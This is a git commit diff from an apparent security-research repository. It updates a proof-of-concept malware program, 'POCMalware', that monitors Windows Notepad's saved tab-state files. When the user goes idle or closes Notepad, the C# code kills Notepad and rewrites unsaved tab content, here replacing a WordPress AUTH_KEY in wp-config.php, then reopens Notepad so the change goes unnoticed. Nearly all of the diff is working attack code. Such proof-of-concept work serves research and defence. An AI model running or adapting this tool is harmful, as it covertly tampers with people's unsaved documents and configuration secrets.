GaslitPad updates

ogmini · ogmini · commit 3b5ab216429f · 2025-01-31T16:47:10.000-05:00
diff --git a/NotepadStateLibrary/POCMalware/App.config b/NotepadStateLibrary/POCMalware/App.config
@@ -1,6 +1,7 @@
 ﻿<?xml version="1.0" encoding="utf-8" ?>
 <configuration>
 	<appSettings>
+		<add key="attackVersion" value="0" />
 		<add key="attackFileName" value="wp-config.php" />
 		<add key="attackRegex" value="define\('AUTH_KEY',\s*'[^']+'\);" />
 		<add key="attackReplace" value="define('AUTH_KEY',         'compromised');" />
diff --git a/NotepadStateLibrary/POCMalware/Program.cs b/NotepadStateLibrary/POCMalware/Program.cs
@@ -20,85 +20,119 @@
 
 //TODO: Make this a list or something of attack target parameters
 //LOL Error checking?
+int attackVersion = Int32.Parse(ConfigurationManager.AppSettings["attackVersion"]); //0 attack when Notepad is open, 1 attacks when Notepad is closed
 string attackFileName = ConfigurationManager.AppSettings["attackFileName"];
 string attackRegex = ConfigurationManager.AppSettings["attackRegex"];
 string attackReplace = ConfigurationManager.AppSettings["attackReplace"];
 bool attackDone = false;
 
-// Dictionary to store file information: file name -> file length to detect changes
-var previousFileState = new Dictionary<string, string>();
 
-Thread monitorThread = new Thread(MonitorNotepad);
-monitorThread.IsBackground = true; // Set as background thread so it terminates when the app closes
-monitorThread.Start();
-
-Console.WriteLine($"Monitoring directory: {directoryToMonitor}");
-Console.WriteLine("Press 'q' to quit...");
-
-// Start a loop to check the directory every few seconds
-while (true)
+if (attackVersion == 0)
 {
-    // Wait for the next polling interval
-    Thread.Sleep(pollingInterval);
+    // Dictionary to store file information: file name -> file length to detect changes
+    var previousFileState = new Dictionary<string, string>();
 
-    Console.WriteLine(InputTimer.GetInputIdleTime().TotalSeconds.ToString());
+    Thread monitorThread = new Thread(MonitorNotepad);
+    monitorThread.IsBackground = true; // Set as background thread so it terminates when the app closes
+    monitorThread.Start();
 
-    // Get the current state of the directory (file names and their hashes)
-    var currentFileState = new Dictionary<string, string>();
-    foreach (var file in Directory.GetFiles(directoryToMonitor))
-    {
-        var fileName = Path.GetFileName(file);
-        var fileByteLength = GetFileByteLength(file); 
-        currentFileState[fileName] = fileByteLength;
-    }
+    Console.WriteLine($"Monitoring directory: {directoryToMonitor}");
+    Console.WriteLine("Press 'q' to quit...");
 
-    // Check for newly added files
-    var addedFiles = currentFileState.Keys.Except(previousFileState.Keys);
-    foreach (var addedFile in addedFiles)
+    // Start a loop to check the directory every few seconds
+    while (true)
     {
-        Console.WriteLine($"File created: {addedFile}");
-        Console.WriteLine(isNotepadRunning.ToString());
-        //TODO: Future
-    }
+        // Wait for the next polling interval
+        Thread.Sleep(pollingInterval);
 
-    // Check for deleted files
-    var deletedFiles = previousFileState.Keys.Except(currentFileState.Keys);
-    foreach (var deletedFile in deletedFiles)
-    {
-        Console.WriteLine($"File deleted: {deletedFile}");
-        Console.WriteLine(isNotepadRunning.ToString());
-        //TODO: Future
-    }
+        Console.WriteLine(InputTimer.GetInputIdleTime().TotalSeconds.ToString());
 
-    // Check for modified files (files that exist in both, but with different lengths)
-    var modifiedFiles = currentFileState
-        .Where(kv => previousFileState.ContainsKey(kv.Key) && kv.Value != previousFileState[kv.Key])
-        .Select(kv => kv.Key);
-    foreach (var modifiedFile in modifiedFiles)
-    {
-        Console.WriteLine($"File modified: {modifiedFile}");
-        Console.WriteLine(isNotepadRunning.ToString());
-        //TODO: Future
-    }
+        // Get the current state of the directory (file names and their hashes)
+        var currentFileState = new Dictionary<string, string>();
+        foreach (var file in Directory.GetFiles(directoryToMonitor))
+        {
+            var fileName = Path.GetFileName(file);
+            var fileByteLength = GetFileByteLength(file);
+            currentFileState[fileName] = fileByteLength;
+        }
 
-    // Update the previous file state for the next iteration
-    previousFileState = new Dictionary<string, string>(currentFileState);
+        // Check for newly added files
+        var addedFiles = currentFileState.Keys.Except(previousFileState.Keys);
+        foreach (var addedFile in addedFiles)
+        {
+            Console.WriteLine($"File created: {addedFile}");
+            Console.WriteLine(isNotepadRunning.ToString());
+            //TODO: Future
+        }
 
-    // Check for Attack conditions
-    if (isNotepadRunning && InputTimer.GetInputIdleTime().TotalSeconds > idleWaitTime && !attackDone)
-    {
-        Console.WriteLine("Starting attack");
-        CloseNotepad();
-        foreach (var file in currentFileState)
+        // Check for deleted files
+        var deletedFiles = previousFileState.Keys.Except(currentFileState.Keys);
+        foreach (var deletedFile in deletedFiles)
         {
-            Attack(Path.Combine(directoryToMonitor, file.Key), attackFileName, attackReplace, attackRegex);
+            Console.WriteLine($"File deleted: {deletedFile}");
+            Console.WriteLine(isNotepadRunning.ToString());
+            //TODO: Future
+        }
+
+        // Check for modified files (files that exist in both, but with different lengths)
+        var modifiedFiles = currentFileState
+            .Where(kv => previousFileState.ContainsKey(kv.Key) && kv.Value != previousFileState[kv.Key])
+            .Select(kv => kv.Key);
+        foreach (var modifiedFile in modifiedFiles)
+        {
+            Console.WriteLine($"File modified: {modifiedFile}");
+            Console.WriteLine(isNotepadRunning.ToString());
+            //TODO: Future
+        }
+
+        // Update the previous file state for the next iteration
+        previousFileState = new Dictionary<string, string>(currentFileState);
+
+        // Check for Attack conditions
+        if (isNotepadRunning && InputTimer.GetInputIdleTime().TotalSeconds > idleWaitTime && !attackDone)
+        {
+            Console.WriteLine("Starting attack");
+            CloseNotepad();
+            foreach (var file in currentFileState)
+            {
+                Attack(Path.Combine(directoryToMonitor, file.Key), attackFileName, attackReplace, attackRegex);
+            }
+            OpenNotepad();
+        }
+        // Check for user input to exit
+        if (Console.KeyAvailable && Console.ReadKey(intercept: true).Key == ConsoleKey.Q)
+        {
+            break;
         }
-        OpenNotepad();
     }
-    // Check for user input to exit
-    if (Console.KeyAvailable && Console.ReadKey(intercept: true).Key == ConsoleKey.Q)
+}
+else
+{
+    while (true)
     {
-        break;
+        Thread.Sleep(pollingInterval);
+
+        if (Process.GetProcessesByName("notepad").Count() == 0)
+        {
+            var currentFileState = new Dictionary<string, string>();
+            foreach (var file in Directory.GetFiles(directoryToMonitor))
+            {
+                var fileName = Path.GetFileName(file);
+                var fileByteLength = GetFileByteLength(file);
+                currentFileState[fileName] = fileByteLength;
+            }
+
+            Console.WriteLine("Starting attack");
+            foreach (var file in currentFileState)
+            {
+                Attack(Path.Combine(directoryToMonitor, file.Key), attackFileName, attackReplace, attackRegex);
+            }
+        }
+
+        if (attackDone)
+        {
+            break;
+        }
     }
 }
 
@@ -174,7 +208,7 @@ void Attack(string path, string fileName, string replace, string regexFind)
         {
             NPTabState np = new NPTabState(data, Path.GetFileName(path));
 
-            if (np.TypeFlag <= 1 && Path.GetFileName(np.FilePath) == fileName)
+            if (np.TypeFlag <= 1 && Path.GetFileName(np.FilePath) == fileName && np.Unsaved.SequenceEqual(new byte[] { 0x1 }))
             {
                 string c = np.ContentString;
 
